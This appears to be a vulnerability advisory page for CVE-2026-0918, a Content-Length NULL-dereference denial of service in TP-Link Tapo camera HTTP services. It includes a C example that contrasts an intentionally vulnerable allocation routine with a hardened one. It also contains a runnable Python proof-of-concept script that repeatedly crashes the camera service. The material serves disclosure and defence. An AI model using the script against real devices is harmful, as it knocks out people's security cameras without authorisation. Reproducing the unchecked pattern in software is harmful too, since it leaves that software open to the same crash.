Security Vulnerability Report
CVE-2026-0918 CVSS 7.5 HIGH

CVE-2026-0918

Published: 2026-01-27 18:15:55
Last Modified: 2026-04-29 01:16:03
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

The Tapo C100 v5, C220 v1 and C520WS v2 cameras’ HTTP service does not safely handle POST requests containing an excessively large Content-Length header. The resulting failed memory allocation triggers a NULL pointer dereference, causing the main service process to crash. An unauthenticated attacker can repeatedly crash the service, causing temporary denial of service. The device restarts automatically, and repeated requests can keep it unavailable.
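The failure mode described above next to a bounded alternative, as an added example in C (not TP-Link firmware code and not part of the original record). The function names, the 64 KiB `MAX_BODY` cap and the mapping of return values to HTTP status codes are assumptions for illustration.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

/* Assumed cap for a small embedded HTTP service; not a value from the advisory. */
#define MAX_BODY (64UL * 1024UL)

enum body_status { BODY_OK = 0, BODY_BAD_REQUEST = 400,
                   BODY_TOO_LARGE = 413, BODY_NO_MEMORY = 503 };

/* Flawed pattern matching the description (reconstruction, not vendor code):
 * the header value sizes the buffer and malloc's result is used unchecked. */
char *alloc_body_unchecked(const char *content_length) {
    size_t n = (size_t)strtoull(content_length, NULL, 10);
    char *buf = malloc(n);
    buf[0] = '\0';               /* buf is NULL when the allocation fails */
    return buf;
}

/* Hardened: strict decimal parse, explicit cap, allocation result checked. */
enum body_status alloc_body_checked(const char *content_length,
                                    char **out, size_t *out_len) {
    char *end = NULL, *buf;
    unsigned long long n;
    *out = NULL;
    *out_len = 0;
    if (content_length == NULL || !isdigit((unsigned char)content_length[0]))
        return BODY_BAD_REQUEST;        /* "", "-1", "+5", leading blanks */
    errno = 0;
    n = strtoull(content_length, &end, 10);
    if (*end != '\0')
        return BODY_BAD_REQUEST;        /* trailing junk such as "12abc" */
    if (errno == ERANGE || n > MAX_BODY)
        return BODY_TOO_LARGE;          /* refuse before any allocation */
    buf = malloc((size_t)n + 1);
    if (buf == NULL)
        return BODY_NO_MEMORY;          /* fail the request, not the process */
    buf[n] = '\0';
    *out = buf;
    *out_len = (size_t)n;
    return BODY_OK;
}

int main(void) {
    char *body; size_t len;             /* constructed oversized value below */
    printf("%d\n", alloc_body_checked("99999999999999999", &body, &len));
    return 0;
}
```

Rejecting the length before allocating keeps an oversized header from reaching `malloc` at all, and the NULL check covers allocations that fail for in-range sizes on a memory-constrained device.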

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:tapo_c220_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:tapo_c220:1:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:tapo_c520ws_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:tapo_c520ws:2:*:*:*:*:*:*:* - NOT VULNERABLE
TP-Link Tapo C100 firmware version v5
TP-Link Tapo C220 firmware version v1
TP-Link Tapo C520WS firmware version v2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-0918 PoC - TP-Link Tapo Camera HTTP Service DoS

Description: Send POST request with oversized Content-Length header
to trigger NULL pointer dereference and crash the service.
"""

import socket
import time
import argparse


def send_malicious_request(target_ip, target_port, content_length):
    """
    Send a POST request with an excessively large Content-Length header
    to trigger the NULL pointer dereference vulnerability.

    Args:
        target_ip: Target camera IP address
        target_port: HTTP service port (default: 80)
        content_length: Oversized Content-Length value
    """
    # Construct the malicious HTTP request
    request = f"POST / HTTP/1.1\r\n"
    request += f"Host: {target_ip}\r\n"
    request += f"Content-Length: {content_length}\r\n"
    request += "Connection: keep-alive\r\n"
    request += "\r\n"

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, target_port))
        sock.send(request.encode())
        print(f"[+] Malicious request sent with Content-Length: {content_length}")
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error sending request: {e}")
        return False


def dos_attack(target_ip, target_port, iterations=10, delay=2):
    """
    Perform denial of service attack by repeatedly sending malicious requests.

    Args:
        target_ip: Target camera IP address
        target_port: HTTP service port
        iterations: Number of attack iterations
        delay: Delay between requests in seconds
    """
    print(f"[*] Starting DoS attack against {target_ip}:{target_port}")
    print(f"[*] Sending {iterations} malicious requests...")

    # Use an extremely large Content-Length value
    oversized_length = 99999999999999999

    for i in range(iterations):
        print(f"[*] Iteration {i+1}/{iterations}")
        send_malicious_request(target_ip, target_port, oversized_length)
        time.sleep(delay)

    print("[*] Attack completed. Service should be continuously crashing.")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2026-0918 PoC')
    parser.add_argument('--target', required=True, help='Target IP address')
    parser.add_argument('--port', type=int, default=80, help='Target port (default: 80)')
    parser.add_argument('--iterations', type=int, default=10, help='Number of attack iterations')
    parser.add_argument('--delay', type=float, default=2.0, help='Delay between requests (seconds)')
    args = parser.parse_args()

    dos_attack(args.target, args.port, args.iterations, args.delay)
```

References

https://www.crac-learning.com/post/smart-home-security-research-cve-2026-0918-assigned
https://www.tp-link.com/en/support/download/tapo-c220/v1/
https://www.tp-link.com/en/support/download/tapo-c520ws/v2/
https://www.tp-link.com/us/support/download/tapo-c100/v5/

Raw JSON Data

Record fields not shown in the sections above:

Vulnerability status: Modified
Weakness: CWE-476
cpe:2.3:o:tp-link:tapo_c220_firmware: versionEndExcluding 1.4.2
cpe:2.3:o:tp-link:tapo_c520ws_firmware: versionEndExcluding 1.2.3
CVSS 3.1 (Primary): exploitabilityScore 3.9, impactScore 3.6
CVSS 4.0 (Secondary): 7.1 HIGH, attackVector ADJACENT
CVSS 4.0 Vector: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X